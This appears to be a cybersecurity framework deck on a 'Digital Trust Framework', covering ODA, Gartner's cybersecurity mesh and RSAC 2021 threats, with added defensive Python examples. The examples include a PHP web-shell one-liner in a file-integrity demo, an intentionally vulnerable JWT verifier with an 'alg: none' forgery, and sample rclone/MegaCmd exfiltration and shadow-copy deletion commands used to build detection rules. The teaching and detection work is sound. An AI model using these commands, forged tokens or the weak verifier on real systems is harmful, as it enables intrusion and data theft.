DIGITAL TRUST
FRAMEWORK (DTF)
Maganathin Veeraragaloo
7th December 2021
The TM Forum's Open Digital Architecture (ODA) will be used as
the cornerstone for this Framework
https://www.tmforum.org/oda/
ODA was initially designed for the Telecommunications Industry
inclusive of 5G Services.
The Digital Trust Framework is developed for the 4IR (Fourth Industrial Revolution) environment.
The Digital Trust Framework (DTF) will be a blueprint for modular,
cloud-based, open digital platforms that can be orchestrated using AI.
ODA will be integrated with COBIT 2019, ITIL 4 and ISO/IEC 27005 (information
security risk management) to ensure an overall Digital Trust approach for a
continuously evolving systems environment.
[Diagram: ODA supporting assets around the Digital Trust Framework]
Transformation Tools: As-Is Applications, Transformation Toolkits
Maturity Tools: Metrics, Maturity Models
Data: Benchmark Data, AI Training Data
DIGITAL TRUST FRAMEWORK
[Diagram: Digital Trust Architecture, laid out on the ODA structure]
Governance: Concepts & Principles, Design Guides, Microservices Architecture Governance, AI Governance, Data Governance, Security Governance, Agile Lifecycle Management
Business: Business Capability Repository, Process Framework, Information Framework
Information Systems: Integration Framework, Functional Framework & Architecture Canvas
Implementation: Operation Frameworks, Reference Implementation
Deployment & Run
Technical Architecture: Components, Open APIs, Data Model
DIGITAL TRUST FRAMEWORK
[Diagram: Digital Trust Framework layers: ITIL 4 Capability Framework, Governance & Processes, Cybersecurity Mesh Architecture]
CYBERSECURITY MESH ARCHITECTURE
SOURCE: GARTNER
Software supply-chain attack patterns, with examples in brackets:
1. Authenticated partner compromise (Target, Stuxnet)
2. Outsourced-IT-based attacks (Kaseya, CloudStar)
3. Source code modification (SolarWinds, NotPetya, CCleaner)
4. Modified applications in production (web credit card (CC) scraping)
5. Stolen certificates (Codecov, Bit9, Mimecast)
6. Stolen source code (RSA)
7. Open-source code components (RubyGems)
8. App store and browser plug-in trojans (Exodus, Great Suspender)
SOURCE: GARTNER – FIRSTBROOK
1. Testing Software Integrity
To address software integrity vulnerabilities:
• Maintain a software inventory and incorporate a software bill of materials (SBOM)
• Deploy file integrity monitoring and threat hunt regularly
• Perform purple team exercises to sharpen security posture
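The file integrity monitoring bullet above, as an added example (not code from the cited RSAC material or any product): a tree is hashed into a baseline manifest, the manifest is sealed with an HMAC so an intruder cannot quietly rewrite it, and a later scan reports modified, added and removed files. The install tree, file contents, the web-shell name and the sealing key are constructed for the demo.

```python
"""File-integrity monitoring in miniature: hash a tree, seal the baseline,
re-scan later and report drift. Added example; all paths and keys are made up."""
import hashlib
import hmac
import json
import tempfile
from pathlib import Path

BASELINE_KEY = b"constructed-demo-key"  # assumption: in practice kept off-host


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root: Path) -> dict:
    """Map every regular file under root (relative POSIX path) to its SHA-256."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def seal(baseline: dict, key: bytes):
    """Serialize the baseline and MAC it; the MAC is what the later check trusts."""
    body = json.dumps(baseline, sort_keys=True).encode()
    return body, hmac.new(key, body, hashlib.sha256).hexdigest()


def unseal(body: bytes, mac: str, key: bytes) -> dict:
    """Refuse a manifest whose MAC no longer matches (constant-time compare)."""
    if not hmac.compare_digest(hmac.new(key, body, hashlib.sha256).hexdigest(), mac):
        raise ValueError("baseline manifest has been tampered with")
    return json.loads(body)


def diff(baseline: dict, current: dict) -> dict:
    """Classify drift between the sealed baseline and a fresh scan."""
    return {
        "modified": sorted(k for k in baseline if k in current and baseline[k] != current[k]),
        "added": sorted(k for k in current if k not in baseline),
        "removed": sorted(k for k in baseline if k not in current),
    }


def demo() -> dict:
    """Baseline a tiny install tree, tamper with it, and report what FIM sees."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "app").write_bytes(b"\x7fELF original build")
        (root / "config.yml").write_text("debug: false\n")
        body, mac = seal(scan(root), BASELINE_KEY)

        # Simulated compromise: patched binary, deleted config, dropped web shell.
        (root / "bin" / "app").write_bytes(b"\x7fELF backdoored build")
        (root / "config.yml").unlink()
        (root / "shell.php").write_text("<?php system($_GET['c']); ?>\n")

        result = diff(unseal(body, mac, BASELINE_KEY), scan(root))

        # An attacker who also edits the stored manifest to whitelist the
        # web shell is caught by the MAC check, not by the hash comparison.
        forged = json.dumps({**json.loads(body), "shell.php": "00" * 32}).encode()
        try:
            unseal(forged, mac, BASELINE_KEY)
            result["manifest_tamper_detected"] = False
        except ValueError:
            result["manifest_tamper_detected"] = True
        return result


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Hashing alone only tells you that something changed; the sealed manifest is what makes the answer trustworthy once the host itself is suspect, which is why the baseline and its key should live off the monitored system.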
2. Excessive Access By Tokens
Single sign-on (SSO) and multi-factor authentication (MFA) harden the initial login, but they do nothing
once an attacker already holds a valid session or access token: if that one token is all that is needed to
traverse the network's resources, SSO turns a single theft into broad access. For token administrators, the
job becomes scoping tokens (audience, permissions, lifetime) so that a hijacked token carries the least
privilege possible. Token theft and replay typically happen without the user ever noticing.
3. Using Vulnerable Crypto For Application Access
As with software integrity, developers are caught between impatient consumer demand and doing
security properly.
The result is organizations and token generators that use cryptography with known vulnerabilities: users get
into the application faster, but the organization is more exposed as a consequence.
Organizations must validate their application access systems (token formats, signing algorithms, key
handling) to ensure attackers cannot break or bypass the crypto that gates access.
SOURCE: https://www.esecurityplanet.com/trends/vulnerabilities-rsac-2021/
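Points 2 and 3 above meet in the access token. The following added example (mine, not from the cited RSAC coverage or any library) shows a compact HS256 JWT verifier written two ways: `verify_weak` lets the token's own header decide how it is verified, so an unsigned `alg: none` token is accepted, which is a well-known JWT weakness; `verify_strict` pins the algorithm, compares signatures in constant time, and then enforces expiry, audience and scope so that a stolen token cannot be replayed at another service or used beyond its grant. The secret key, audience names, scopes and subject are constructed values.

```python
"""Token verification: an alg-trusting verifier beside a pinned, scoped one.
Added example; the key, audiences and scopes below are made up."""
import base64
import hashlib
import hmac
import json
import time

SECRET = b"constructed-demo-secret-do-not-reuse"  # assumption: shared HS256 key


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def mint(claims: dict, key: bytes, alg: str = "HS256") -> str:
    """Issue a compact JWT. alg="none" yields an unsigned token (the attacker's path)."""
    header = b64url(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload = b64url(json.dumps(claims).encode())
    signing_input = f"{header}.{payload}".encode()
    sig = "" if alg == "none" else b64url(hmac.new(key, signing_input, hashlib.sha256).digest())
    return f"{header}.{payload}.{sig}"


def verify_weak(token: str, key: bytes) -> dict:
    """Vulnerable pattern: the untrusted header chooses the verification method."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header["alg"] == "none":            # attacker-chosen: no signature required
        return json.loads(b64url_decode(p))
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if b64url_decode(s) != expected:       # also a timing-variable comparison
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


def verify_strict(token: str, key: bytes, audience: str, required_scope: str, now=None) -> dict:
    """Hardened pattern: pin the algorithm, constant-time compare, then least privilege."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":        # never let the token pick the algorithm
        raise ValueError("algorithm not allowed")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url_decode(s), expected):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(p))
    now = time.time() if now is None else now
    if float(claims.get("exp", 0)) <= now:
        raise ValueError("token expired")
    if claims.get("aud") != audience:       # a token minted for one service must not work at another
        raise ValueError("audience mismatch")
    if required_scope not in claims.get("scope", "").split():
        raise ValueError("insufficient scope")
    return claims


def demo() -> dict:
    """Which verifier accepts which token; every value should be True."""
    now = 1_700_000_000.0
    good = mint({"sub": "alice", "aud": "billing-api", "scope": "invoice:read", "exp": now + 600}, SECRET)
    forged = mint({"sub": "alice", "aud": "billing-api", "scope": "invoice:read admin",
                   "exp": now + 600}, b"", alg="none")
    replayed = mint({"sub": "alice", "aud": "hr-api", "scope": "invoice:read", "exp": now + 600}, SECRET)

    def accepted(fn):
        try:
            fn()
            return True
        except ValueError:
            return False

    return {
        "weak_accepts_forged": accepted(lambda: verify_weak(forged, SECRET)),
        "strict_rejects_forged": not accepted(lambda: verify_strict(forged, SECRET, "billing-api", "invoice:read", now)),
        "strict_accepts_good": accepted(lambda: verify_strict(good, SECRET, "billing-api", "invoice:read", now)),
        "strict_rejects_wrong_audience": not accepted(lambda: verify_strict(replayed, SECRET, "billing-api", "invoice:read", now)),
        "strict_rejects_scope_escalation": not accepted(lambda: verify_strict(good, SECRET, "billing-api", "invoice:write", now)),
    }


if __name__ == "__main__":
    print(demo())
```

The audience and scope checks are the "excessive access" controls: even a genuine token is useless at a service it was not issued for, and a read-only grant stays read-only. Real deployments should also reject tokens without `exp`, rotate keys, and prefer asymmetric signing so that verifiers never hold a secret that can mint tokens.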
4. Ransomware: Encryption, Exfiltration, And Extortion
Ransomware of the past was an availability problem: data was encrypted and
held to ransom.
The new normal among ransomware families adds exfiltration and extortion, so
restoring from backup alone no longer ends the incident.
A SANS senior instructor walked through the process attackers follow:
i. initial access,
ii. reconnaissance,
iii. lateral movement,
iv. exfiltration, and
v. encryption.
Using legitimate file-sharing tools such as RClone and MegaCmdServer to blend
in with normal traffic, attackers can download the network's data
undetected.
While victims who paid have usually had their data returned in the past,
there is no honour among thieves.
Conti, Netwalker and Sodinokibi are all recent ransomware strains that
re-extorted victims or published network contents after the ransom had been
paid.
SOURCE: https://www.esecurityplanet.com/trends/vulnerabilities-rsac-2021/
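The exfiltration stage above is where the RClone / MegaCmd tradecraft can be caught before encryption starts. The following added example (mine, not from the SANS talk or any vendor) runs a small rule set, of the kind one would encode as Sigma rules, over constructed process-creation events: it flags rclone transfer verbs, MegaCmd binaries, and rclone that has been renamed to a benign-looking name but still carries rclone's distinctive command-line flags, and then reports hosts where exfiltration activity precedes an encryption-stage indicator (shadow-copy deletion). The host names, paths and command lines are made up; the MegaCmd binary names are the ones the tool ships with, but treat that list as an assumption to check against your own inventory.

```python
"""Toy detection pass over process-creation telemetry for rclone / MegaCmd
staging ahead of encryption. Added example; the events are constructed."""
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    ts: str        # ISO-8601 UTC, so string order is time order
    host: str
    image: str     # full path of the started binary
    cmdline: str


# Constructed sample telemetry, not real incident data.
EVENTS = [
    ProcEvent("2021-11-30T01:02:03Z", "FS01", r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
    ProcEvent("2021-11-30T01:10:00Z", "FS01", r"C:\ProgramData\rclone.exe",
              r'rclone.exe copy "\\FS01\Finance" mega:finance --config C:\ProgramData\rc.conf --transfers 32 --ignore-existing -q'),
    ProcEvent("2021-11-30T01:12:00Z", "FS02", r"C:\Users\Public\svchost.exe",
              r"svchost.exe sync D:\HR remote:hr --config C:\Users\Public\r.conf --multi-thread-streams 12 --auto-confirm"),
    ProcEvent("2021-11-30T01:15:00Z", "FS03", r"C:\Tools\MEGAcmd\MEGAcmdServer.exe",
              "MEGAcmdServer.exe"),
    ProcEvent("2021-11-30T01:16:00Z", "FS03", r"C:\Tools\MEGAcmd\MEGAclient.exe",
              r"MEGAclient.exe put D:\Legal\*.pdf /backup"),
    ProcEvent("2021-11-30T02:00:00Z", "FS01", r"C:\Windows\System32\vssadmin.exe",
              "vssadmin delete shadows /all /quiet"),
    ProcEvent("2021-11-30T09:00:00Z", "WS07", r"C:\Program Files\rclone\rclone.exe",
              "rclone.exe ls backup:"),   # benign listing by an admin: no transfer verb
]

# rclone flags that survive renaming the binary (assumption: tune to your environment)
RCLONE_FLAGS = {"--config", "--transfers", "--ignore-existing", "--multi-thread-streams",
                "--auto-confirm", "--no-check-certificate", "--bwlimit"}
TRANSFER_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
MEGACMD_IMAGES = {"megacmdserver.exe", "megaclient.exe", "megacmdshell.exe", "mega-cmd", "mega-put"}


def classify(ev: ProcEvent) -> Optional[Tuple[str, str]]:
    """Return (rule name, kill-chain stage) for a suspicious event, else None."""
    image = ev.image.lower().replace("/", "\\").rsplit("\\", 1)[-1]
    tokens = ev.cmdline.split()
    verb = tokens[1].lower() if len(tokens) > 1 else ""
    flags = {t.lower().split("=")[0] for t in tokens if t.startswith("--")}
    if image in MEGACMD_IMAGES:
        return ("MegaCmd tooling executed", "exfiltration")
    if image == "rclone.exe" and verb in TRANSFER_VERBS:
        return ("rclone transfer", "exfiltration")
    if verb in TRANSFER_VERBS and len(flags & RCLONE_FLAGS) >= 2:
        return ("renamed rclone (flag signature)", "exfiltration")
    if image == "vssadmin.exe" and verb == "delete" and "shadows" in ev.cmdline.lower():
        return ("shadow copy deletion", "encryption")
    return None


def detect(events: List[ProcEvent]) -> List[dict]:
    hits = []
    for ev in events:
        c = classify(ev)
        if c:
            hits.append({"ts": ev.ts, "host": ev.host, "rule": c[0], "stage": c[1]})
    return hits


def hosts_exfil_before_encryption(hits: List[dict]) -> List[str]:
    """Hosts where an exfiltration hit precedes an encryption-stage hit: escalate these."""
    by_host = defaultdict(lambda: {"exfiltration": [], "encryption": []})
    for h in hits:
        by_host[h["host"]][h["stage"]].append(h["ts"])
    return sorted(host for host, s in by_host.items()
                  if s["exfiltration"] and s["encryption"]
                  and min(s["exfiltration"]) < max(s["encryption"]))


if __name__ == "__main__":
    found = detect(EVENTS)
    for h in found:
        print(h)
    print("escalate:", hosts_exfil_before_encryption(found))
```

The renamed-rclone rule is the one worth keeping: image-name matching is trivially evaded, whereas the transfer verb plus two or more rclone-specific flags is hard to avoid while still moving data. Pair it with network telemetry for the destination (cloud storage domains, unusual egress volume) rather than relying on process events alone.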
Cybersecurity mesh architecture, per Gartner:
• Redefines cybersecurity perimeters around the identity of a person or thing
• Limits an attacker who has compromised one part of a network from pivoting to the rest
• Distributed architectural approach = scalable, flexible and reliable cybersecurity control
• More standardized, responsive security approach
Instead of SIEM and SOAR integrating security tools, the security
mesh will use security analytics and intelligence. The mesh will also
include identity, policy, posture and dashboard layers.
Cybersecurity mesh architecture, or CSMA, "is more than XDR."
XDR, or extended detection and response, has emerged as a new
way for security vendors to tie their products together in a unified
platform. XDR is a "potential foundation" for the security analytics
and intelligence that CSMA requires, as are SIEM and SOAR,
which "can add value" to the security analytics/intelligence layer in
a security mesh.
Secure Access Service Edge (SASE) technology is a mesh-like approach
to delivering distinct functions in an integrated manner, but the
security mesh has "a broader scope."
STANDARDS ALIGNMENT
1. Threat Detection
• STIX / TAXII
• Sigma
2. IAM
• SAML
• OIDC
• OAuth
• SCIM
• XACML
• OPA
• JWT
3. Network Format
• IPFIX
4. Nascent
• IDQL
• CAEP
5. Other
• OpenDXL
• NIST SCAP v2
6. Standard Formats
• Snort
• Zeek
• YARA (language)
7. Frameworks
• OWASP Top 10
• MITRE [ATT&CK, D3FEND]
• CVSS
• Cyber Kill Chain
• CVE
WHAT IS A DECENTRALIZED IDENTITY?
[Figure: Decentralized identity architecture. Source: Gartner]
Traditional Identity and Access Management (IAM) has
"issues with security, scalability, reliability and privacy."
IAM has itself become a target of credential theft and
other attack techniques.
However, decentralized identity is as yet an "unproven
technology," held back by limited blockchain understanding and
skills and by the difficulty of assessing risks across
blockchain services.
CYBERSECURITY MESH - DIGITAL TRUST FRAMEWORK